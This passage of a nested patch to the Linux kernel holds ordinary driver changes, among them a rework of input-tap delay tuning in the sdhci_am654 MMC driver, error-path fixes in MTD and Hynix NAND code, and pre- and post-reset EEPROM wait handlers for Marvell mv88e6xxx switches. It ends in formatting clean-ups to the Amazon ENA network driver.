++		itap = (pass_window.start + (pass_window.length >> 1)) % ITAPDLY_LENGTH;
++
++	return (itap > ITAPDLY_LAST_INDEX) ? ITAPDLY_LAST_INDEX >> 1 : itap;
++}
++
+ static int sdhci_am654_platform_execute_tuning(struct sdhci_host *host,
+ 					       u32 opcode)
+ {
+ 	struct sdhci_pltfm_host *pltfm_host = sdhci_priv(host);
+ 	struct sdhci_am654_data *sdhci_am654 = sdhci_pltfm_priv(pltfm_host);
+-	int cur_val, prev_val = 1, fail_len = 0, pass_window = 0, pass_len;
+-	u32 itap;
++	unsigned char timing = host->mmc->ios.timing;
++	struct window fail_window[ITAPDLY_LENGTH];
++	u8 curr_pass, itap;
++	u8 fail_index = 0;
++	u8 prev_pass = 1;
++
++	memset(fail_window, 0, sizeof(fail_window));
+ 
+ 	/* Enable ITAPDLY */
+-	regmap_update_bits(sdhci_am654->base, PHY_CTRL4, ITAPDLYENA_MASK,
+-			   1 << ITAPDLYENA_SHIFT);
++	sdhci_am654->itap_del_ena[timing] = 0x1;
++
++	for (itap = 0; itap < ITAPDLY_LENGTH; itap++) {
++		sdhci_am654_write_itapdly(sdhci_am654, itap, sdhci_am654->itap_del_ena[timing]);
+ 
+-	for (itap = 0; itap < ITAP_MAX; itap++) {
+-		sdhci_am654_write_itapdly(sdhci_am654, itap);
++		curr_pass = !mmc_send_tuning(host->mmc, opcode, NULL);
+ 
+-		cur_val = !mmc_send_tuning(host->mmc, opcode, NULL);
+-		if (cur_val && !prev_val)
+-			pass_window = itap;
++		if (!curr_pass && prev_pass)
++			fail_window[fail_index].start = itap;
++
++		if (!curr_pass) {
++			fail_window[fail_index].end = itap;
++			fail_window[fail_index].length++;
++		}
+ 
+-		if (!cur_val)
+-			fail_len++;
++		if (curr_pass && !prev_pass)
++			fail_index++;
+ 
+-		prev_val = cur_val;
++		prev_pass = curr_pass;
+ 	}
+-	/*
+-	 * Having determined the length of the failing window and start of
+-	 * the passing window calculate the length of the passing window and
+-	 * set the final value halfway through it considering the range as a
+-	 * circular buffer
+-	 */
+-	pass_len = ITAP_MAX - fail_len;
+-	itap = (pass_window + (pass_len >> 1)) % ITAP_MAX;
+-	sdhci_am654_write_itapdly(sdhci_am654, itap);
++
++	if (fail_window[fail_index].length != 0)
++		fail_index++;
++
++	itap = sdhci_am654_calculate_itap(host, fail_window, fail_index,
++					  sdhci_am654->dll_enable);
++
++	sdhci_am654_write_itapdly(sdhci_am654, itap, sdhci_am654->itap_del_ena[timing]);
++
++	/* Save ITAPDLY */
++	sdhci_am654->itap_del_sel[timing] = itap;
+ 
+ 	return 0;
+ }
+@@ -576,32 +665,15 @@ static int sdhci_am654_get_otap_delay(struct sdhci_host *host,
+ 	int i;
+ 	int ret;
+ 
+-	ret = device_property_read_u32(dev, td[MMC_TIMING_LEGACY].otap_binding,
+-				 &sdhci_am654->otap_del_sel[MMC_TIMING_LEGACY]);
+-	if (ret) {
+-		/*
+-		 * ti,otap-del-sel-legacy is mandatory, look for old binding
+-		 * if not found.
+-		 */
+-		ret = device_property_read_u32(dev, "ti,otap-del-sel",
+-					       &sdhci_am654->otap_del_sel[0]);
+-		if (ret) {
+-			dev_err(dev, "Couldn't find otap-del-sel\n");
+-
+-			return ret;
+-		}
+-
+-		dev_info(dev, "Using legacy binding ti,otap-del-sel\n");
+-		sdhci_am654->legacy_otapdly = true;
+-
+-		return 0;
+-	}
+-
+ 	for (i = MMC_TIMING_LEGACY; i <= MMC_TIMING_MMC_HS400; i++) {
+ 
+ 		ret = device_property_read_u32(dev, td[i].otap_binding,
+ 					       &sdhci_am654->otap_del_sel[i]);
+ 		if (ret) {
++			if (i == MMC_TIMING_LEGACY) {
++				dev_err(dev, "Couldn't find mandatory ti,otap-del-sel-legacy\n");
++				return ret;
++			}
+ 			dev_dbg(dev, "Couldn't find %s\n",
+ 				td[i].otap_binding);
+ 			/*
+@@ -614,9 +686,12 @@ static int sdhci_am654_get_otap_delay(struct sdhci_host *host,
+ 				host->mmc->caps2 &= ~td[i].capability;
+ 		}
+ 
+-		if (td[i].itap_binding)
+-			device_property_read_u32(dev, td[i].itap_binding,
+-						 &sdhci_am654->itap_del_sel[i]);
++		if (td[i].itap_binding) {
++			ret = device_property_read_u32(dev, td[i].itap_binding,
++						       &sdhci_am654->itap_del_sel[i]);
++			if (!ret)
++				sdhci_am654->itap_del_ena[i] = 0x1;
++		}
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/mtd/mtdcore.c b/drivers/mtd/mtdcore.c
+index 24518e5e1b5e4..ad527bdbd4632 100644
+--- a/drivers/mtd/mtdcore.c
++++ b/drivers/mtd/mtdcore.c
+@@ -942,8 +942,10 @@ static int mtd_otp_nvmem_add(struct mtd_info *mtd)
+ 
+ 	if (mtd->_get_user_prot_info && mtd->_read_user_prot_reg) {
+ 		size = mtd_otp_size(mtd, true);
+-		if (size < 0)
+-			return size;
++		if (size < 0) {
++			err = size;
++			goto err;
++		}
+ 
+ 		if (size > 0) {
+ 			nvmem = mtd_otp_nvmem_register(mtd, "user-otp", size,
+diff --git a/drivers/mtd/nand/raw/nand_hynix.c b/drivers/mtd/nand/raw/nand_hynix.c
+index 0d4d4bbfdecea..49e36767d8f76 100644
+--- a/drivers/mtd/nand/raw/nand_hynix.c
++++ b/drivers/mtd/nand/raw/nand_hynix.c
+@@ -402,7 +402,7 @@ static int hynix_nand_rr_init(struct nand_chip *chip)
+ 	if (ret)
+ 		pr_warn("failed to initialize read-retry infrastructure");
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ static void hynix_nand_extract_oobsize(struct nand_chip *chip,
+diff --git a/drivers/net/Makefile b/drivers/net/Makefile
+index 6ce076462dbfd..c2f4d4bbf65aa 100644
+--- a/drivers/net/Makefile
++++ b/drivers/net/Makefile
+@@ -48,7 +48,9 @@ obj-$(CONFIG_ARCNET) += arcnet/
+ obj-$(CONFIG_DEV_APPLETALK) += appletalk/
+ obj-$(CONFIG_CAIF) += caif/
+ obj-$(CONFIG_CAN) += can/
+-obj-$(CONFIG_NET_DSA) += dsa/
++ifdef CONFIG_NET_DSA
++obj-y += dsa/
++endif
+ obj-$(CONFIG_ETHERNET) += ethernet/
+ obj-$(CONFIG_FDDI) += fddi/
+ obj-$(CONFIG_HIPPI) += hippi/
+diff --git a/drivers/net/dsa/microchip/ksz_common.c b/drivers/net/dsa/microchip/ksz_common.c
+index dc9eea3c8ab16..f9f43897f86c1 100644
+--- a/drivers/net/dsa/microchip/ksz_common.c
++++ b/drivers/net/dsa/microchip/ksz_common.c
+@@ -2540,7 +2540,7 @@ phy_interface_t ksz_get_xmii(struct ksz_device *dev, int port, bool gbit)
+ 		else
+ 			interface = PHY_INTERFACE_MODE_MII;
+ 	} else if (val == bitval[P_RMII_SEL]) {
+-		interface = PHY_INTERFACE_MODE_RGMII;
++		interface = PHY_INTERFACE_MODE_RMII;
+ 	} else {
+ 		interface = PHY_INTERFACE_MODE_RGMII;
+ 		if (data8 & P_RGMII_ID_EG_ENABLE)
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index 517c50d11fbce..dc4ff8a6d0bf5 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -3003,6 +3003,7 @@ static int mv88e6xxx_software_reset(struct mv88e6xxx_chip *chip)
+ static void mv88e6xxx_hardware_reset(struct mv88e6xxx_chip *chip)
+ {
+ 	struct gpio_desc *gpiod = chip->reset;
++	int err;
+ 
+ 	/* If there is a GPIO connected to the reset pin, toggle it */
+ 	if (gpiod) {
+@@ -3011,17 +3012,26 @@ static void mv88e6xxx_hardware_reset(struct mv88e6xxx_chip *chip)
+ 		 * mid-byte, causing the first EEPROM read after the reset
+ 		 * from the wrong location resulting in the switch booting
+ 		 * to wrong mode and inoperable.
++		 * For this reason, switch families with EEPROM support
++		 * generally wait for EEPROM loads to complete as their pre-
++		 * and post-reset handlers.
+ 		 */
+-		if (chip->info->ops->get_eeprom)
+-			mv88e6xxx_g2_eeprom_wait(chip);
++		if (chip->info->ops->hardware_reset_pre) {
++			err = chip->info->ops->hardware_reset_pre(chip);
++			if (err)
++				dev_err(chip->dev, "pre-reset error: %d\n", err);
++		}
+ 
+ 		gpiod_set_value_cansleep(gpiod, 1);
+ 		usleep_range(10000, 20000);
+ 		gpiod_set_value_cansleep(gpiod, 0);
+ 		usleep_range(10000, 20000);
+ 
+-		if (chip->info->ops->get_eeprom)
+-			mv88e6xxx_g2_eeprom_wait(chip);
++		if (chip->info->ops->hardware_reset_post) {
++			err = chip->info->ops->hardware_reset_post(chip);
++			if (err)
++				dev_err(chip->dev, "post-reset error: %d\n", err);
++		}
+ 	}
+ }
+ 
+@@ -4339,6 +4349,8 @@ static const struct mv88e6xxx_ops mv88e6141_ops = {
+ 	.watchdog_ops = &mv88e6390_watchdog_ops,
+ 	.mgmt_rsvd2cpu =  mv88e6390_g1_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.rmu_disable = mv88e6390_g1_rmu_disable,
+ 	.atu_get_hash = mv88e6165_g1_atu_get_hash,
+@@ -4529,6 +4541,8 @@ static const struct mv88e6xxx_ops mv88e6172_ops = {
+ 	.watchdog_ops = &mv88e6097_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6352_g2_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.rmu_disable = mv88e6352_g1_rmu_disable,
+ 	.atu_get_hash = mv88e6165_g1_atu_get_hash,
+@@ -4630,6 +4644,8 @@ static const struct mv88e6xxx_ops mv88e6176_ops = {
+ 	.watchdog_ops = &mv88e6097_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6352_g2_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.rmu_disable = mv88e6352_g1_rmu_disable,
+ 	.atu_get_hash = mv88e6165_g1_atu_get_hash,
+@@ -4731,6 +4747,8 @@ static const struct mv88e6xxx_ops mv88e6190_ops = {
+ 	.watchdog_ops = &mv88e6390_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6390_g1_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.rmu_disable = mv88e6390_g1_rmu_disable,
+ 	.atu_get_hash = mv88e6165_g1_atu_get_hash,
+@@ -4794,6 +4812,8 @@ static const struct mv88e6xxx_ops mv88e6190x_ops = {
+ 	.watchdog_ops = &mv88e6390_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6390_g1_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.rmu_disable = mv88e6390_g1_rmu_disable,
+ 	.atu_get_hash = mv88e6165_g1_atu_get_hash,
+@@ -4855,6 +4875,8 @@ static const struct mv88e6xxx_ops mv88e6191_ops = {
+ 	.watchdog_ops = &mv88e6390_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6390_g1_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.rmu_disable = mv88e6390_g1_rmu_disable,
+ 	.atu_get_hash = mv88e6165_g1_atu_get_hash,
+@@ -4919,6 +4941,8 @@ static const struct mv88e6xxx_ops mv88e6240_ops = {
+ 	.watchdog_ops = &mv88e6097_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6352_g2_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.rmu_disable = mv88e6352_g1_rmu_disable,
+ 	.atu_get_hash = mv88e6165_g1_atu_get_hash,
+@@ -4977,6 +5001,8 @@ static const struct mv88e6xxx_ops mv88e6250_ops = {
+ 	.watchdog_ops = &mv88e6250_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6352_g2_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6250_g1_wait_eeprom_done_prereset,
++	.hardware_reset_post = mv88e6xxx_g1_wait_eeprom_done,
+ 	.reset = mv88e6250_g1_reset,
+ 	.vtu_getnext = mv88e6185_g1_vtu_getnext,
+ 	.vtu_loadpurge = mv88e6185_g1_vtu_loadpurge,
+@@ -5021,6 +5047,8 @@ static const struct mv88e6xxx_ops mv88e6290_ops = {
+ 	.watchdog_ops = &mv88e6390_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6390_g1_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.rmu_disable = mv88e6390_g1_rmu_disable,
+ 	.atu_get_hash = mv88e6165_g1_atu_get_hash,
+@@ -5085,6 +5113,8 @@ static const struct mv88e6xxx_ops mv88e6320_ops = {
+ 	.watchdog_ops = &mv88e6390_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6352_g2_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.vtu_getnext = mv88e6185_g1_vtu_getnext,
+ 	.vtu_loadpurge = mv88e6185_g1_vtu_loadpurge,
+@@ -5129,6 +5159,8 @@ static const struct mv88e6xxx_ops mv88e6321_ops = {
+ 	.set_egress_port = mv88e6095_g1_set_egress_port,
+ 	.watchdog_ops = &mv88e6390_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6352_g2_mgmt_rsvd2cpu,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.vtu_getnext = mv88e6185_g1_vtu_getnext,
+ 	.vtu_loadpurge = mv88e6185_g1_vtu_loadpurge,
+@@ -5177,6 +5209,8 @@ static const struct mv88e6xxx_ops mv88e6341_ops = {
+ 	.watchdog_ops = &mv88e6390_watchdog_ops,
+ 	.mgmt_rsvd2cpu =  mv88e6390_g1_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.rmu_disable = mv88e6390_g1_rmu_disable,
+ 	.atu_get_hash = mv88e6165_g1_atu_get_hash,
+@@ -5333,6 +5367,8 @@ static const struct mv88e6xxx_ops mv88e6352_ops = {
+ 	.watchdog_ops = &mv88e6097_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6352_g2_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.rmu_disable = mv88e6352_g1_rmu_disable,
+ 	.atu_get_hash = mv88e6165_g1_atu_get_hash,
+@@ -5400,6 +5436,8 @@ static const struct mv88e6xxx_ops mv88e6390_ops = {
+ 	.watchdog_ops = &mv88e6390_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6390_g1_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.rmu_disable = mv88e6390_g1_rmu_disable,
+ 	.atu_get_hash = mv88e6165_g1_atu_get_hash,
+@@ -5467,6 +5505,8 @@ static const struct mv88e6xxx_ops mv88e6390x_ops = {
+ 	.watchdog_ops = &mv88e6390_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6390_g1_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.rmu_disable = mv88e6390_g1_rmu_disable,
+ 	.atu_get_hash = mv88e6165_g1_atu_get_hash,
+@@ -5537,6 +5577,8 @@ static const struct mv88e6xxx_ops mv88e6393x_ops = {
+ 	.watchdog_ops = &mv88e6393x_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6393x_port_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
++	.hardware_reset_pre = mv88e6xxx_g2_eeprom_wait,
++	.hardware_reset_post = mv88e6xxx_g2_eeprom_wait,
+ 	.reset = mv88e6352_g1_reset,
+ 	.rmu_disable = mv88e6390_g1_rmu_disable,
+ 	.atu_get_hash = mv88e6165_g1_atu_get_hash,
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.h b/drivers/net/dsa/mv88e6xxx/chip.h
+index 97a47d8743fd3..b34e96e689d5c 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.h
++++ b/drivers/net/dsa/mv88e6xxx/chip.h
+@@ -458,6 +458,12 @@ struct mv88e6xxx_ops {
+ 	int (*ppu_enable)(struct mv88e6xxx_chip *chip);
+ 	int (*ppu_disable)(struct mv88e6xxx_chip *chip);
+ 
++	/* Additional handlers to run before and after hard reset, to make sure
++	 * that the switch and EEPROM are in a good state.
++	 */
++	int (*hardware_reset_pre)(struct mv88e6xxx_chip *chip);
++	int (*hardware_reset_post)(struct mv88e6xxx_chip *chip);
++
+ 	/* Switch Software Reset */
+ 	int (*reset)(struct mv88e6xxx_chip *chip);
+ 
+diff --git a/drivers/net/dsa/mv88e6xxx/global1.c b/drivers/net/dsa/mv88e6xxx/global1.c
+index 964928285782c..83c6d1fab94ab 100644
+--- a/drivers/net/dsa/mv88e6xxx/global1.c
++++ b/drivers/net/dsa/mv88e6xxx/global1.c
+@@ -75,6 +75,95 @@ static int mv88e6xxx_g1_wait_init_ready(struct mv88e6xxx_chip *chip)
+ 	return mv88e6xxx_g1_wait_bit(chip, MV88E6XXX_G1_STS, bit, 1);
+ }
+ 
++static int mv88e6250_g1_eeprom_reload(struct mv88e6xxx_chip *chip)
++{
++	/* MV88E6185_G1_CTL1_RELOAD_EEPROM is also valid for 88E6250 */
++	int bit = __bf_shf(MV88E6185_G1_CTL1_RELOAD_EEPROM);
++	u16 val;
++	int err;
++
++	err = mv88e6xxx_g1_read(chip, MV88E6XXX_G1_CTL1, &val);
++	if (err)
++		return err;
++
++	val |= MV88E6185_G1_CTL1_RELOAD_EEPROM;
++
++	err = mv88e6xxx_g1_write(chip, MV88E6XXX_G1_CTL1, val);
++	if (err)
++		return err;
++
++	return mv88e6xxx_g1_wait_bit(chip, MV88E6XXX_G1_CTL1, bit, 0);
++}
++
++/* Returns 0 when done, -EBUSY when waiting, other negative codes on error */
++static int mv88e6xxx_g1_is_eeprom_done(struct mv88e6xxx_chip *chip)
++{
++	u16 val;
++	int err;
++
++	err = mv88e6xxx_g1_read(chip, MV88E6XXX_G1_STS, &val);
++	if (err < 0) {
++		dev_err(chip->dev, "Error reading status");
++		return err;
++	}
++
++	/* If the switch is still resetting, it may not
++	 * respond on the bus, and so MDIO read returns
++	 * 0xffff. Differentiate between that, and waiting for
++	 * the EEPROM to be done by bit 0 being set.
++	 */
++	if (val == 0xffff || !(val & BIT(MV88E6XXX_G1_STS_IRQ_EEPROM_DONE)))
++		return -EBUSY;
++
++	return 0;
++}
++
++/* As the EEInt (EEPROM done) flag clears on read if the status register, this
++ * function must be called directly after a hard reset or EEPROM ReLoad request,
++ * or the done condition may have been missed
++ */
++int mv88e6xxx_g1_wait_eeprom_done(struct mv88e6xxx_chip *chip)
++{
++	const unsigned long timeout = jiffies + 1 * HZ;
++	int ret;
++
++	/* Wait up to 1 second for the switch to finish reading the
++	 * EEPROM.
++	 */
++	while (time_before(jiffies, timeout)) {
++		ret = mv88e6xxx_g1_is_eeprom_done(chip);
++		if (ret != -EBUSY)
++			return ret;
++	}
++
++	dev_err(chip->dev, "Timeout waiting for EEPROM done");
++	return -ETIMEDOUT;
++}
++
++int mv88e6250_g1_wait_eeprom_done_prereset(struct mv88e6xxx_chip *chip)
++{
++	int ret;
++
++	ret = mv88e6xxx_g1_is_eeprom_done(chip);
++	if (ret != -EBUSY)
++		return ret;
++
++	/* Pre-reset, we don't know the state of the switch - when
++	 * mv88e6xxx_g1_is_eeprom_done() returns -EBUSY, that may be because
++	 * the switch is actually busy reading the EEPROM, or because
++	 * MV88E6XXX_G1_STS_IRQ_EEPROM_DONE has been cleared by an unrelated
++	 * status register read already.
++	 *
++	 * To account for the latter case, trigger another EEPROM reload for
++	 * another chance at seeing the done flag.
++	 */
++	ret = mv88e6250_g1_eeprom_reload(chip);
++	if (ret)
++		return ret;
++
++	return mv88e6xxx_g1_wait_eeprom_done(chip);
++}
++
+ /* Offset 0x01: Switch MAC Address Register Bytes 0 & 1
+  * Offset 0x02: Switch MAC Address Register Bytes 2 & 3
+  * Offset 0x03: Switch MAC Address Register Bytes 4 & 5
+diff --git a/drivers/net/dsa/mv88e6xxx/global1.h b/drivers/net/dsa/mv88e6xxx/global1.h
+index 04b57a21f7868..f3c0b8ab6461b 100644
+--- a/drivers/net/dsa/mv88e6xxx/global1.h
++++ b/drivers/net/dsa/mv88e6xxx/global1.h
+@@ -281,6 +281,8 @@ int mv88e6xxx_g1_set_switch_mac(struct mv88e6xxx_chip *chip, u8 *addr);
+ int mv88e6185_g1_reset(struct mv88e6xxx_chip *chip);
+ int mv88e6352_g1_reset(struct mv88e6xxx_chip *chip);
+ int mv88e6250_g1_reset(struct mv88e6xxx_chip *chip);
++int mv88e6xxx_g1_wait_eeprom_done(struct mv88e6xxx_chip *chip);
++int mv88e6250_g1_wait_eeprom_done_prereset(struct mv88e6xxx_chip *chip);
+ 
+ int mv88e6185_g1_ppu_enable(struct mv88e6xxx_chip *chip);
+ int mv88e6185_g1_ppu_disable(struct mv88e6xxx_chip *chip);
+diff --git a/drivers/net/ethernet/amazon/ena/ena_admin_defs.h b/drivers/net/ethernet/amazon/ena/ena_admin_defs.h
+index 466ad9470d1f4..6de0d590be34f 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_admin_defs.h
++++ b/drivers/net/ethernet/amazon/ena/ena_admin_defs.h
+@@ -869,7 +869,9 @@ struct ena_admin_host_info {
+ 	 * 2 : interrupt_moderation
+ 	 * 3 : rx_buf_mirroring
+ 	 * 4 : rss_configurable_function_key
+-	 * 31:5 : reserved
++	 * 5 : reserved
++	 * 6 : rx_page_reuse
++	 * 31:7 : reserved
+ 	 */
+ 	u32 driver_supported_features;
+ };
+@@ -1184,6 +1186,8 @@ struct ena_admin_ena_mmio_req_read_less_resp {
+ #define ENA_ADMIN_HOST_INFO_RX_BUF_MIRRORING_MASK           BIT(3)
+ #define ENA_ADMIN_HOST_INFO_RSS_CONFIGURABLE_FUNCTION_KEY_SHIFT 4
+ #define ENA_ADMIN_HOST_INFO_RSS_CONFIGURABLE_FUNCTION_KEY_MASK BIT(4)
++#define ENA_ADMIN_HOST_INFO_RX_PAGE_REUSE_SHIFT             6
++#define ENA_ADMIN_HOST_INFO_RX_PAGE_REUSE_MASK              BIT(6)
+ 
+ /* aenq_common_desc */
+ #define ENA_ADMIN_AENQ_COMMON_DESC_PHASE_MASK               BIT(0)
+diff --git a/drivers/net/ethernet/amazon/ena/ena_com.c b/drivers/net/ethernet/amazon/ena/ena_com.c
+index 4db689372980e..276f6a8631fb1 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_com.c
++++ b/drivers/net/ethernet/amazon/ena/ena_com.c
+@@ -90,8 +90,7 @@ static int ena_com_admin_init_sq(struct ena_com_admin_queue *admin_queue)
+ 	struct ena_com_admin_sq *sq = &admin_queue->sq;
+ 	u16 size = ADMIN_SQ_SIZE(admin_queue->q_depth);
+ 
+-	sq->entries = dma_alloc_coherent(admin_queue->q_dmadev, size,
+-					 &sq->dma_addr, GFP_KERNEL);
++	sq->entries = dma_alloc_coherent(admin_queue->q_dmadev, size, &sq->dma_addr, GFP_KERNEL);
+ 
+ 	if (!sq->entries) {
+ 		netdev_err(ena_dev->net_device, "Memory allocation failed\n");
+@@ -113,8 +112,7 @@ static int ena_com_admin_init_cq(struct ena_com_admin_queue *admin_queue)
+ 	struct ena_com_admin_cq *cq = &admin_queue->cq;
+ 	u16 size = ADMIN_CQ_SIZE(admin_queue->q_depth);
+ 
+-	cq->entries = dma_alloc_coherent(admin_queue->q_dmadev, size,
+-					 &cq->dma_addr, GFP_KERNEL);
++	cq->entries = dma_alloc_coherent(admin_queue->q_dmadev, size, &cq->dma_addr, GFP_KERNEL);
+ 
+ 	if (!cq->entries) {
+ 		netdev_err(ena_dev->net_device, "Memory allocation failed\n");
+@@ -136,8 +134,7 @@ static int ena_com_admin_init_aenq(struct ena_com_dev *ena_dev,
+ 
+ 	ena_dev->aenq.q_depth = ENA_ASYNC_QUEUE_DEPTH;
+ 	size = ADMIN_AENQ_SIZE(ENA_ASYNC_QUEUE_DEPTH);
+-	aenq->entries = dma_alloc_coherent(ena_dev->dmadev, size,
+-					   &aenq->dma_addr, GFP_KERNEL);
++	aenq->entries = dma_alloc_coherent(ena_dev->dmadev, size, &aenq->dma_addr, GFP_KERNEL);
+ 
+ 	if (!aenq->entries) {
+ 		netdev_err(ena_dev->net_device, "Memory allocation failed\n");
+@@ -155,14 +152,13 @@ static int ena_com_admin_init_aenq(struct ena_com_dev *ena_dev,
+ 
+ 	aenq_caps = 0;
+ 	aenq_caps |= ena_dev->aenq.q_depth & ENA_REGS_AENQ_CAPS_AENQ_DEPTH_MASK;
+-	aenq_caps |= (sizeof(struct ena_admin_aenq_entry)
+-		      << ENA_REGS_AENQ_CAPS_AENQ_ENTRY_SIZE_SHIFT) &
+-		     ENA_REGS_AENQ_CAPS_AENQ_ENTRY_SIZE_MASK;
++	aenq_caps |=
++		(sizeof(struct ena_admin_aenq_entry) << ENA_REGS_AENQ_CAPS_AENQ_ENTRY_SIZE_SHIFT) &
++		ENA_REGS_AENQ_CAPS_AENQ_ENTRY_SIZE_MASK;
+ 	writel(aenq_caps, ena_dev->reg_bar + ENA_REGS_AENQ_CAPS_OFF);
+ 
+ 	if (unlikely(!aenq_handlers)) {
+-		netdev_err(ena_dev->net_device,
+-			   "AENQ handlers pointer is NULL\n");
++		netdev_err(ena_dev->net_device, "AENQ handlers pointer is NULL\n");
+ 		return -EINVAL;
+ 	}
+ 
+@@ -189,14 +185,12 @@ static struct ena_comp_ctx *get_comp_ctxt(struct ena_com_admin_queue *admin_queu
+ 	}
+ 
+ 	if (unlikely(!admin_queue->comp_ctx)) {
+-		netdev_err(admin_queue->ena_dev->net_device,
+-			   "Completion context is NULL\n");
++		netdev_err(admin_queue->ena_dev->net_device, "Completion context is NULL\n");
+ 		return NULL;
+ 	}
+ 
+ 	if (unlikely(admin_queue->comp_ctx[command_id].occupied && capture)) {
+-		netdev_err(admin_queue->ena_dev->net_device,
+-			   "Completion context is occupied\n");
++		netdev_err(admin_queue->ena_dev->net_device, "Completion context is occupied\n");
+ 		return NULL;
+ 	}
+ 
+@@ -226,8 +220,7 @@ static struct ena_comp_ctx *__ena_com_submit_admin_cmd(struct ena_com_admin_queu
+ 	/* In case of queue FULL */
+ 	cnt = (u16)atomic_read(&admin_queue->outstanding_cmds);
+ 	if (cnt >= admin_queue->q_depth) {
+-		netdev_dbg(admin_queue->ena_dev->net_device,
+-			   "Admin queue is full.\n");
++		netdev_dbg(admin_queue->ena_dev->net_device, "Admin queue is full.\n");
+ 		admin_queue->stats.out_of_space++;
+ 		return ERR_PTR(-ENOSPC);
+ 	}
+@@ -274,8 +267,7 @@ static int ena_com_init_comp_ctxt(struct ena_com_admin_queue *admin_queue)
+ 	struct ena_comp_ctx *comp_ctx;
+ 	u16 i;
+ 
+-	admin_queue->comp_ctx =
+-		devm_kzalloc(admin_queue->q_dmadev, size, GFP_KERNEL);
++	admin_queue->comp_ctx = devm_kzalloc(admin_queue->q_dmadev, size, GFP_KERNEL);
+ 	if (unlikely(!admin_queue->comp_ctx)) {
